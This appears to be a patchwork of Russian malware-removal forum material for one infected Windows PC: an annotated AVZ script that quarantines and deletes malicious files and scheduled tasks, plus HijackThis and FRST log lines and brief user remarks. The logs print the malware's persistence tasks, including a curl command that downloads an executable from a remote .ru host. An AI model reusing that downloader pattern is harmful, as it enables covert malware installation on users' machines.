178.132.6.57
193.238.153.54
35.177.46.238
46.101.28.31
82.202.226.203
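// AVZ remediation script (runs inside AVZ: File -> Run script).
// Every path, task name and flag below comes from the log for this one host;
// re-check them against a fresh log before reusing the script elsewhere.
begin
  // Take the network down first so the downloader task ("curl" in the
  // HijackThis output, which fetches curl.exe from a remote host) cannot
  // re-fetch its payload while the files are being removed.
  ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);

  // Quarantine before deletion: AVZ keeps a copy for later analysis
  // (packed into quarantine.zip by the separate CreateQurantineArchive script).
  QuarantineFile('C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py', '');
  QuarantineFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe', '');

  // Delete everything that was quarantined above, one DeleteFile per file
  // (the original script deleted curl.exe twice and never deleted
  // CurrencyConvertor\app.py and CurrencyConvertor\ml.py, although both were
  // quarantined and their scheduled tasks are removed below).
  DeleteFile('C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py', '64');
  DeleteFile('C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe', '64');

  // Task definition files under system32\Tasks (the persistence mechanism:
  // tasks in the HijackThis O22 lines plus the unnamed GUID task from FRST).
  // NOTE(review): these use the flag 'x64' while the user-profile files above
  // use '64' — confirm against the AVZ DeleteFile documentation which spelling
  // it expects; the two forms are unlikely to both be intentional.
  DeleteFile('C:\WINDOWS\system32\Tasks\{704B1058-6981-4DFF-B521-E0E3DEA27878}', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\curl', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\curls', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\CurrencyConvertor', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\CurrencyConvertor2', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\cyyMvLzPGa', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\Scheduled Update S-1-8-22', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\setupsk', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\setupsk_upd', 'x64');
  DeleteFile('C:\WINDOWS\system32\Tasks\xWwMI', 'x64');

  // Unregister the tasks from the Task Scheduler as well, so the scheduler
  // does not keep stale registrations pointing at the deleted files.
  // The GUID task {704B1058-...} has no schtasks entry here; it is only
  // removed as a file above (FRST reports it as "No File").
  ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "CurrencyConvertor2" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "cyyMvLzPGa" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "Scheduled Update S-1-8-22" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "setupsk" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "setupsk_upd" /F', 0, 15000, true);
  ExecuteFile('schtasks.exe', '/delete /TN "xWwMI" /F', 0, 15000, true);

  // Hand the pending deletions to BootCleaner (files still locked by a
  // running process are removed at the next boot), run the system clean-up,
  // activate BootCleaner, run the SCU wizard and reboot to apply it all.
  BC_ImportALL;
  ExecuteSysClean;
  BC_Activate;
  ExecuteWizard('SCU', 2, 3, true);
  RebootWindows(true);
end.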
// Second AVZ script, run after the reboot that the clean-up script triggers:
// packs the AVZ quarantine folder into quarantine.zip next to AVZ so the
// quarantined samples can be uploaded for analysis.
// "Qurantine" is the actual spelling of the AVZ function name — do not "fix" it.
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E9410C70-B6AE-41FF-AB71-32F4B279EA5F} [SuggestionsURLFallback] = http://clients5.google.com/complete/search?q={searchTerms}&hl={language}&gl={language}&client=ie8&mw={ie:maxWidth}&sh={ie:sectionHeight}&rh={ie:rowHeight}&inputencoding={inputEncoding}&outputencoding={outputEncoding} - Google
O2 - HKLM\..\BHO: (no name) - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers: 00asw - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task: (disabled) Scheduled Update S-1-8-22 - C:\WINDOWS\explorer.exe http://rokomi.ru
O22 - Task: CurrencyConvertor - C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\ml.py" --APPNAME="CurrencyConvertor" (file missing)
O22 - Task: CurrencyConvertor2 - C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\CurrencyConvertor\app.py" (file missing)
O22 - Task: curl - C:\Users\Zo_rick\AppData\Roaming\curl\curl_7_54.exe -f -L http://amtomil.ru/f.exe -o C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe
O22 - Task: curls - C:\Users\Zo_rick\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task: cyyMvLzPGa - C:\Users\Zo_rick\AppData\Local\vymftvIiGM.bat (file missing)
O22 - Task: setupsk - C:\Users\Zo_rick\AppData\Roaming\setupsk\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\setupsk\ml.py" --APPNAME="setupsk" (file missing)
O22 - Task: setupsk_upd - C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\python\pythonw.exe "C:\Users\Zo_rick\AppData\Roaming\SETUPS~1\ml.py" --APPNAME="setupsk_upd" (file missing)
O22 - Task: xWwMI - C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA.bat (file missing)
Start::
CreateRestorePoint:
VirusTotal: C:\Program Files (x86)\SCM\SCM.exe
GroupPolicy: Restriction ? <==== ATTENTION
GroupPolicy\User: Restriction ? <==== ATTENTION
2017-12-06 22:55 - 2017-09-29 16:42 - 000000070 _____ () C:\Users\Zo_rick\AppData\Local\SJsSmnnoXoA
2017-12-06 22:55 - 2017-09-29 16:42 - 000000072 _____ () C:\Users\Zo_rick\AppData\Local\vymftvIiGM
2017-12-06 22:55 - 2017-12-06 22:55 - 000000001 _____ () C:\Users\Zo_rick\AppData\Local\WMI.ini
2017-12-06 22:55 - 2017-09-29 16:42 - 000001202 _____ () C:\Users\Zo_rick\AppData\Local\WQmMNCWmk
2017-09-29 16:42 - 2017-09-29 16:42 - 000001202 _____ () C:\Users\Zo_rick\AppData\Local\WQmMNCWmk.bat
2017-12-06 22:55 - 2017-09-29 16:42 - 000001198 _____ () C:\Users\Zo_rick\AppData\Local\gUnfaSrsnCv
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers3: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> No File
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
Task: {A7194199-4471-4E71-975F-96481AD14A85} - \{704B1058-6981-4DFF-B521-E0E3DEA27878} -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\PACE:3B3F2425358D33BE [217]
AlternateDataStreams: C:\Users\Все пользователи\PACE:3B3F2425358D33BE [217]
EmptyTemp:
Reboot:
End::
# AdwCleaner 7.0.5.0 - Logfile created on Mon Dec 11 06:31:34 2017
Какой именно процесс, не заметили? Частенько нагружается ЦП до 80.
Сейчас тестируем новую версию автологера с новой версией AVZ на борту. Сейчас базы не обновляются. В меню пункт «Обновление баз» неактивен, нажать на него не могу.